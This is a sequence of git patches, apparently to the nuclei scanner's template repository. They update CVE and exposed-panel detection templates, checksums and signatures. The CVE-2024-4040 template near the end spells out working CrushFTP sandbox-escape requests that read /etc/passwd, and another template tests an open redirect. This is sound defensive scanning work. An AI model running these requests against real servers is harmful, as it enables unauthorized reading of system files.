(70%) diff --git a/http/exposed-panels/cyberchef-detect.yaml b/http/exposed-panels/cyberchef-panel.yaml similarity index 70% rename from http/exposed-panels/cyberchef-detect.yaml rename to http/exposed-panels/cyberchef-panel.yaml index 077787a72e..959878d9b8 100644 --- a/http/exposed-panels/cyberchef-detect.yaml +++ b/http/exposed-panels/cyberchef-panel.yaml @@ -4,10 +4,15 @@ info: name: Cyber Chef Panel Detect author: rxerium severity: info - description: A Cyber Chef Panel was detected + description: | + A Cyber Chef Panel was detected reference: - https://cyberchef.org - tags: panel,cyberchef,detect + metadata: + shodan-query: title:"CyberChef" + verified: true + max-request: 1 + tags: panel,cyberchef,login,detect http: - method: GET @@ -28,4 +33,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 From eb9c8c312e0ea0d89fa498cc0aed43cde02abc24 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 6 May 2024 08:18:41 +0530 Subject: [PATCH 0576/1768] Update CVE-2023-6389.yaml --- http/cves/2023/ CVE-2023-6389.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/ CVE-2023-6389.yaml b/http/cves/2023/ CVE-2023-6389.yaml index 51d52aebbd..8e352947e3 100644 --- a/http/cves/2023/ CVE-2023-6389.yaml +++ b/http/cves/2023/ CVE-2023-6389.yaml @@ -7,8 +7,8 @@ info: description: | The plugin redirects to any URL via the "wptbto" parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-6389 - https://wpscan.com/vulnerability/04dafc55-3a8d-4dd2-96da-7a8b100e5a81/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-6389 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -18,10 +18,12 @@ info: epss-percentile: 0.40297 cpe: cpe:2.3:a:abhinavsingh:wordpress_toolbar:*:*:*:*:*:*:wordpress:* metadata: + verified: true + max-request: 1 vendor: abhinavsingh product: wordpress_toolbar - max-request: 1 - tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp + publicwww-query: "/wp-content/plugins/wordpress-toolbar/" + tags: cve,cve2023,wordpress,wp-plugin,wordpress-toolbar,wp,redirect http: - method: GET From 80606720ffee7300b06118c828c988a26bf98b22 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 02:50:21 +0000 Subject: [PATCH 0578/1768] Auto Generated Templates Checksum [Mon May 6 02:50:21 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 06c571f9e9..1dbbb110dd 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -451,7 +451,7 @@ file/malware/bozok-malware.yaml:b997aa419b2d0ce9c6edf79c9031e4e943fd79a7 file/malware/bublik-malware.yaml:1ca6a30e1865b979a297ee0f5c92878ba68b57bb file/malware/cap-hookexkeylogger-malware.yaml:6622fc9690427fb8d818e84d47bd268f49253261 file/malware/cerber-malware.yaml:8d600a1106a51bcd2709c8156127741cfbb5d0f5 -file/malware/cerberus-malware.yaml:38966c3659344648f0dcf0eab98da65e0024bfe5 +file/malware/cerberus-malware.yaml:8b64f79c230b73acc92cd8639343592205d5de92 file/malware/clientmesh-malware.yaml:3450451cee310b336b87f7380015172d8c8b1e90 file/malware/crimson-malware.yaml:a882939cc1854f5853ab7b79bb7e263302507316 file/malware/crunchrat-malware.yaml:9700327529d967b11598c0d9550db4d5fb3ecf91 @@ -6458,7 +6458,7 @@ http/takeovers/aha-takeover.yaml:58e3e7a7486be85c7687c793b5663b84759788a8 http/takeovers/airee-takeover.yaml:bd00657159494039fc36913d03ddbf767fa1b93b http/takeovers/anima-takeover.yaml:959b664c800ede2e97646180a495f6295d916231 http/takeovers/announcekit-takeover.yaml:92fb87a534f3f920e480a963886f8796836c8383 -http/takeovers/aws-bucket-takeover.yaml:85490ff028be5d7f7abc038654e80f0a55471bfa +http/takeovers/aws-bucket-takeover.yaml:533b13757c82d22d8235f679fadfda0e036d4591 http/takeovers/bigcartel-takeover.yaml:6a8f5abf7259eb5f4a4106653fc665b950b4190a http/takeovers/bitbucket-takeover.yaml:60402aa2ecf993deccac40923f21ce71974dc780 http/takeovers/campaignmonitor-takeover.yaml:615bfc25c0b488b95d44a0eda7bb5d7af254cacf @@ -8472,7 +8472,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6ff0f37ae13e24adfceb910899da406422ad96dd +templates-checksum.txt:0f14b26460620768648bc6e17d1f36df7d17d770 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fbe716b9b1d23ceff1e71cef9b37d1b4370ac9f6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 02:52:05 +0000 Subject: [PATCH 0579/1768] Auto Template Signing [Mon May 6 02:52:05 UTC 2024] :robot: --- file/malware/cerberus-malware.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/file/malware/cerberus-malware.yaml b/file/malware/cerberus-malware.yaml index f105418ff5..6d214d0b04 100644 --- a/file/malware/cerberus-malware.yaml +++ b/file/malware/cerberus-malware.yaml @@ -27,5 +27,4 @@ file: words: - "cerberus" case-insensitive: true - -# digest: 490a00463044022006c23cd80a8b9974883e26b0cfb251e5834a1340be09efe1c38d397f5ea1b9470220723d8425e377276fde160744c4191d1496a8ad12d48084235c96fc995c3deace:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200678f44915a5092567fbd406db0b2f65cef3054cdfcead092d2c7b6948b4a1140221009fc67f2da5ca58feecf9cbae46120b737b1d0c4f70697c4cb8c2aea828a3d4be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cb1221ac1b05e3f8b42d8c1d57004947f0bd45ea Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 6 May 2024 08:25:40 +0530 Subject: [PATCH 0580/1768] updated info & matchers --- http/cves/2024/CVE-2024-2340.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-2340.yaml b/http/cves/2024/CVE-2024-2340.yaml index 74615dd55c..1a17a99599 100644 --- a/http/cves/2024/CVE-2024-2340.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -1,7 +1,7 @@ id: CVE-2024-2340 info: - name: Avada < 7.11.7 - Unauthenticated Sensitive Information Exposure via Form Uploads Directory Listing + name: Avada < 7.11.7 - Information Disclosure author: t3l3machus severity: medium description: | @@ -9,9 +9,9 @@ info: remediation: Fixed in 7.11.7 reference: - https://vulners.com/wpvulndb/WPVDB-ID:507E1D07-4953-4A31-81E8-80F01F971E2A - - https://nvd.nist.gov/vuln/detail/CVE-2024-2340 - https://avada.com/documentation/avada-changelog/ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8db8bbc3-43ca-4ef5-a44d-2987c8597961?source=cve + - https://nvd.nist.gov/vuln/detail/CVE-2024-2340 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 @@ -21,7 +21,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2024,wp-plugin,wp,wordpress,unauthenticated,wpscan + tags: cve,cve2024,wp-theme,wp,wordpress,wpscan,avada,exposure http: - method: GET @@ -34,6 +34,7 @@ http: part: body regex: - 'Index of [\s\S]*title>' + - 'fusion' condition: and - type: status From e523168c0991d536f1934084d683b7c9f6427f85 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 6 May 2024 02:56:11 +0000 Subject: [PATCH 0581/1768] Auto Generated New Template Addition List [Mon May 6 02:56:11 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cd04ef4a59..3256b8fbb3 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,6 @@ http/cves/2015/CVE-2015-4455.yaml http/cves/2019/CVE-2019-7139.yaml +http/cves/2023/ CVE-2023-6389.yaml http/cves/2023/CVE-2023-1892.yaml http/cves/2023/CVE-2023-2227.yaml http/cves/2023/CVE-2023-27032.yaml From aac69680cbf3a3cdd9853f9b5601bf860bbc6198 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 6 May 2024 02:56:16 +0000 Subject: [PATCH 0582/1768] Auto Generated Templates Checksum [Mon May 6 02:56:16 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1dbbb110dd..3ef75b2698 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -451,7 +451,7 @@ file/malware/bozok-malware.yaml:b997aa419b2d0ce9c6edf79c9031e4e943fd79a7 file/malware/bublik-malware.yaml:1ca6a30e1865b979a297ee0f5c92878ba68b57bb file/malware/cap-hookexkeylogger-malware.yaml:6622fc9690427fb8d818e84d47bd268f49253261 file/malware/cerber-malware.yaml:8d600a1106a51bcd2709c8156127741cfbb5d0f5 -file/malware/cerberus-malware.yaml:8b64f79c230b73acc92cd8639343592205d5de92 +file/malware/cerberus-malware.yaml:74b8c9a01b459e4eb65c460d32d7d149bfe54334 file/malware/clientmesh-malware.yaml:3450451cee310b336b87f7380015172d8c8b1e90 file/malware/crimson-malware.yaml:a882939cc1854f5853ab7b79bb7e263302507316 file/malware/crunchrat-malware.yaml:9700327529d967b11598c0d9550db4d5fb3ecf91 @@ -2867,6 +2867,7 @@ http/cves/2022/CVE-2022-48012.yaml:a314bcd807127751eafd5704712ad817119d1e5d http/cves/2022/CVE-2022-48165.yaml:2924708e53089f3448ccb9e4456eab50a255e475 http/cves/2022/CVE-2022-48197.yaml:3637340a7a0a61a3a666170aa7c61cfba8420427 http/cves/2022/CVE-2022-4897.yaml:69298dfcb359adcc00a49f5df06cd3ced0c5bd9f +http/cves/2023/ CVE-2023-6389.yaml:ccf6ee7e55f87f5cf63f1836d6a90f661976a5ed http/cves/2023/CVE-2023-0099.yaml:9407e1c3bced15c82b969d23516fd90490c1aee1 http/cves/2023/CVE-2023-0126.yaml:c9dec5f824c521f0333efd2134fce5831ff3b45b http/cves/2023/CVE-2023-0159.yaml:623f9ab092c9590e7d9b3e245fe2f8b090df54f5 @@ -8472,7 +8473,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0f14b26460620768648bc6e17d1f36df7d17d770 +templates-checksum.txt:dca9313ff6472a3ff4fcabf8d65a73f7be925ae6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 96fbfd4076ab4038004d953e966345ad37d952de Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Mon, 6 May 2024 02:56:53 +0000 Subject: [PATCH 0583/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0a317a8efd..d7675e7dd9 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2015/CVE-2015-4455.yaml' - 'http/cves/2019/CVE-2019-7139.yaml' + - 'http/cves/2023/ CVE-2023-6389.yaml' - 'http/cves/2023/CVE-2023-1892.yaml' - 'http/cves/2023/CVE-2023-2227.yaml' - 'http/cves/2023/CVE-2023-27032.yaml' From e109faa9c1554ec8ff79b0282790db16132836b3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Mon, 6 May 2024 02:57:56 +0000 Subject: [PATCH 0584/1768] Auto Template Signing [Mon May 6 02:57:56 UTC 2024] :robot: --- http/cves/2023/ CVE-2023-6389.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/ CVE-2023-6389.yaml b/http/cves/2023/ CVE-2023-6389.yaml index 8e352947e3..51ae4b3056 100644 --- a/http/cves/2023/ CVE-2023-6389.yaml +++ b/http/cves/2023/ CVE-2023-6389.yaml @@ -35,3 +35,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' +# digest: 4a0a00473045022100c227bbaa90d02a8b9a508a44f888cc765c6a1454560b1517de91547f856b16df022006e4ae4b398be8b002c3d5d69184bc04a8181d0019c21f8ed05cf288b73b603c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b57bc7eaeb1ac3d94fd27518604a5d654d738b73 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 6 May 2024 08:29:28 +0530 Subject: [PATCH 0585/1768] updated matcher --- http/exposed-panels/cyberchef-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/cyberchef-panel.yaml b/http/exposed-panels/cyberchef-panel.yaml index 959878d9b8..5c94e420de 100644 --- a/http/exposed-panels/cyberchef-panel.yaml +++ b/http/exposed-panels/cyberchef-panel.yaml @@ -1,7 +1,7 @@ id: cyberchef-panel info: - name: Cyber Chef Panel Detect + name: Cyber Chef Panel - Detect author: rxerium severity: info description: | @@ -9,9 +9,9 @@ info: reference: - https://cyberchef.org metadata: - shodan-query: title:"CyberChef" verified: true max-request: 1 + shodan-query: title:"CyberChef" tags: panel,cyberchef,login,detect http: @@ -28,7 +28,7 @@ http: part: body words: - '<title>CyberChef' - - 'The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis' + - 'The Cyber Swiss Army Knife' condition: and - type: status From 00f010d85244bc5e1b22c79dd4b72779b3a7c2bf Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 03:00:05 +0000 Subject: [PATCH 0586/1768] Auto Generated New Template Addition List [Mon May 6 03:00:05 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3256b8fbb3..24f9378740 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ http/cves/2023/CVE-2023-4973.yaml http/cves/2023/CVE-2023-5003.yaml http/cves/2024/CVE-2024-0235.yaml http/cves/2024/CVE-2024-1183.yaml +http/cves/2024/CVE-2024-2340.yaml http/cves/2024/CVE-2024-23917.yaml http/cves/2024/CVE-2024-24131.yaml http/cves/2024/CVE-2024-27956.yaml From 75e8be00eb7247d3117aca608e58b88478c40cd4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 03:00:16 +0000 Subject: [PATCH 0587/1768] Auto Generated Templates Checksum [Mon May 6 03:00:16 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3ef75b2698..a82ff1f06c 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2867,7 +2867,7 @@ http/cves/2022/CVE-2022-48012.yaml:a314bcd807127751eafd5704712ad817119d1e5d http/cves/2022/CVE-2022-48165.yaml:2924708e53089f3448ccb9e4456eab50a255e475 http/cves/2022/CVE-2022-48197.yaml:3637340a7a0a61a3a666170aa7c61cfba8420427 http/cves/2022/CVE-2022-4897.yaml:69298dfcb359adcc00a49f5df06cd3ced0c5bd9f -http/cves/2023/ CVE-2023-6389.yaml:ccf6ee7e55f87f5cf63f1836d6a90f661976a5ed +http/cves/2023/ CVE-2023-6389.yaml:902cb47b37fc4b41609b99c966f67bb0ac252124 http/cves/2023/CVE-2023-0099.yaml:9407e1c3bced15c82b969d23516fd90490c1aee1 http/cves/2023/CVE-2023-0126.yaml:c9dec5f824c521f0333efd2134fce5831ff3b45b http/cves/2023/CVE-2023-0159.yaml:623f9ab092c9590e7d9b3e245fe2f8b090df54f5 @@ -3247,6 +3247,7 @@ http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0 http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe +http/cves/2024/CVE-2024-2340.yaml:f8194e1a80d3f7a9e95dbf098b12adf22fc37006 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba @@ -8473,7 +8474,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:dca9313ff6472a3ff4fcabf8d65a73f7be925ae6 +templates-checksum.txt:0ec9c64e9837f210bb9abe83f886039b5c066944 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 888e3efd650d2d718c240c3831ad05139e7ae44d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 03:01:00 +0000 Subject: [PATCH 0588/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index d7675e7dd9..5790cf96cb 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -21,6 +21,7 @@ on: - 'http/cves/2023/CVE-2023-5003.yaml' - 'http/cves/2024/CVE-2024-0235.yaml' - 'http/cves/2024/CVE-2024-1183.yaml' + - 'http/cves/2024/CVE-2024-2340.yaml' - 'http/cves/2024/CVE-2024-23917.yaml' - 'http/cves/2024/CVE-2024-24131.yaml' - 'http/cves/2024/CVE-2024-27956.yaml' From 1b589dd0aeb0eb4c11de968665076ecf874863d4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 03:02:07 +0000 Subject: [PATCH 0589/1768] Auto Template Signing [Mon May 6 03:02:07 UTC 2024] :robot: --- http/cves/2024/CVE-2024-2340.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-2340.yaml b/http/cves/2024/CVE-2024-2340.yaml index 1a17a99599..7d39720ff7 100644 --- a/http/cves/2024/CVE-2024-2340.yaml +++ b/http/cves/2024/CVE-2024-2340.yaml @@ -40,3 +40,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502210086a9d9e4d491bbdaf66cc96f24d32ffa31c10df273bab32f91385760014d579b022048d3aa9fe3beec267bb552efa870d3ac9644d1501b28f39ab998dbef346ba1dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From e723ea908d58a22f688bfad57c8425f30dd5a5c9 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 03:02:50 +0000 Subject: [PATCH 0590/1768] Auto Generated New Template Addition List [Mon May 6 03:02:50 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 24f9378740..eabf494839 100644 --- a/.new-additions +++ b/.new-additions @@ -31,6 +31,7 @@ http/default-logins/crushftp/crushftp-default-login.yaml http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/cassia-bluetooth-gateway-panel.yaml +http/exposed-panels/cyberchef-panel.yaml http/exposed-panels/femtocell-panel.yaml http/exposed-panels/monitorr-panel.yaml http/exposed-panels/tixeo-panel.yaml From 7d5455d9aa9686a73363c500cf7cee65138a8528 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 03:02:59 +0000 Subject: [PATCH 0591/1768] Auto Generated Templates Checksum [Mon May 6 03:02:59 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index a82ff1f06c..f3f2536e90 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3247,7 +3247,7 @@ http/cves/2024/CVE-2024-22024.yaml:36f71684ca8bef143db91384fa7437000786c8b0 http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe -http/cves/2024/CVE-2024-2340.yaml:f8194e1a80d3f7a9e95dbf098b12adf22fc37006 +http/cves/2024/CVE-2024-2340.yaml:bf15cb04b444f7c09b0602e12e9bb3c77cd7ecf7 http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-23917.yaml:91acf4a916db564da116aad3221f1a662477c3ed http/cves/2024/CVE-2024-24131.yaml:71f3b885b69ae4e2beffc8df3a036dcfc75a8cba @@ -3688,6 +3688,7 @@ http/exposed-panels/cudatel-panel.yaml:c079445a851e40233a8c56dfda788e5c9b32547b http/exposed-panels/cvent-panel-detect.yaml:a87e443274a8ae60dfeb181ff9e3ab288246d852 http/exposed-panels/cwp-webpanel.yaml:9ccee2ed3e4baface4e30a0567b2e46c2976851e http/exposed-panels/cx-cloud-login.yaml:eacbb09b6c7b16b4234ac371e71b2130c738cb5e +http/exposed-panels/cyberchef-panel.yaml:9c355c539653f2078acb9d1df5bb072431ecc25c http/exposed-panels/cyberoam-ssl-vpn-panel.yaml:93abfca996a479f9098e274c3fa5519f6e64f3f9 http/exposed-panels/d-link-wireless.yaml:dbcf6912b865faa71a59141e83d00456ce6ceef0 http/exposed-panels/dahua-web-panel.yaml:c7b88f6dd9cec15974fab83f071cf7ad63d37ee0 @@ -8474,7 +8475,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0ec9c64e9837f210bb9abe83f886039b5c066944 +templates-checksum.txt:e5a186f355e60daf23a56e56635cb7ad0873351e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 864d5d277a9b7cc5b69b889eda5a4fd0432c4b53 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 03:03:33 +0000 Subject: [PATCH 0592/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 5790cf96cb..0c25f86bfc 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -36,6 +36,7 @@ on: - 'http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml' - 'http/exposed-panels/bonobo-server-panel.yaml' - 'http/exposed-panels/cassia-bluetooth-gateway-panel.yaml' + - 'http/exposed-panels/cyberchef-panel.yaml' - 'http/exposed-panels/femtocell-panel.yaml' - 'http/exposed-panels/monitorr-panel.yaml' - 'http/exposed-panels/tixeo-panel.yaml' From 4116f4d38fc8e460353778f6ca465d3c046a6fdc Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 6 May 2024 03:04:42 +0000 Subject: [PATCH 0593/1768] Auto Template Signing [Mon May 6 03:04:42 UTC 2024] :robot: --- http/exposed-panels/cyberchef-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/exposed-panels/cyberchef-panel.yaml b/http/exposed-panels/cyberchef-panel.yaml index 5c94e420de..16f35d626d 100644 --- a/http/exposed-panels/cyberchef-panel.yaml +++ b/http/exposed-panels/cyberchef-panel.yaml @@ -34,3 +34,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100eeeab550b83b31bc31e069dbc7d7cce471d8989ea66e1b428296670776bee510022063c48214d5a3acd4d45dc0a9a6332f1d1d6af2a34518b2388a9183e83622e986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0cdc9def907f96ac169f3505c0aabb04e5d5030c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 6 May 2024 09:17:00 +0530 Subject: [PATCH 0594/1768] Update CVE-2024-4040.yaml --- http/cves/2024/CVE-2024-4040.yaml | 34 ++++++++++++++++--------------- 1 file changed, 18 insertions(+), 16 deletions(-) diff --git a/http/cves/2024/CVE-2024-4040.yaml b/http/cves/2024/CVE-2024-4040.yaml index d09f273343..e60710087f 100644 --- a/http/cves/2024/CVE-2024-4040.yaml +++ b/http/cves/2024/CVE-2024-4040.yaml @@ -1,27 +1,35 @@ id: CVE-2024-4040 info: - name: CrushFTP VFS Sandbox Escape + name: CrushFTP VFS - Sandbox Escape LFR author: DhiyaneshDK,pussycat0x - severity: high + severity: critical description: | VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox. + impact: | + Successful exploitation could lead to unauthorized access to sensitive data. + remediation: | + Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040. reference: - https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/ - https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update - - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update - https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/ - https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N - cvss-score: 7.7 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 cve-id: CVE-2024-4040 - cwe-id: CWE-20 + cwe-id: CWE-94,CWE-1336 + epss-score: 0.016 + epss-percentile: 0.87316 + cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: - shodan-query: html:"CrushFTP" verified: true max-request: 2 - tags: cve,cve2024,lfi,crushftp,vfs + vendor: crushftp + product: crushftp + shodan-query: html:"CrushFTP" + tags: cve,cve2024,lfr,crushftp,vfs,kev flow: | if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) { @@ -32,7 +40,6 @@ flow: | http("login") && http("auth-exploit") } - http: # unauthenticated exploit - id: unauth-exploit @@ -40,7 +47,6 @@ http: - | GET /WebInterface/ HTTP/1.1 Host: {{Hostname}} - - | POST /WebInterface/function/?command=zip&c2f={{auth}}&path=/etc/passwd&names=/bbb HTTP/1.1 Host: {{Hostname}} @@ -50,7 +56,7 @@ http: - type: word part: body_2 words: - - "root:x" + - "root:x:" - type: word part: header @@ -65,14 +71,12 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' - # login script - id: login raw: - | GET /WebInterface/ HTTP/1.1 Host: {{Hostname}} - - | POST /WebInterface/function/ HTTP/1.1 Host: {{Hostname}} @@ -82,7 +86,6 @@ http: command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926 - stop-at-first-match: true matchers-condition: and @@ -107,7 +110,6 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' - # authenticated exploit - id: auth-exploit raw: @@ -119,4 +121,4 @@ http: - type: word part: body words: - - "root:x" + - "root:x:" From 6ffb4b1d291e090b02f9943c670dac713ae9e4cf Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 6 May 2024 03:56:40 +0000 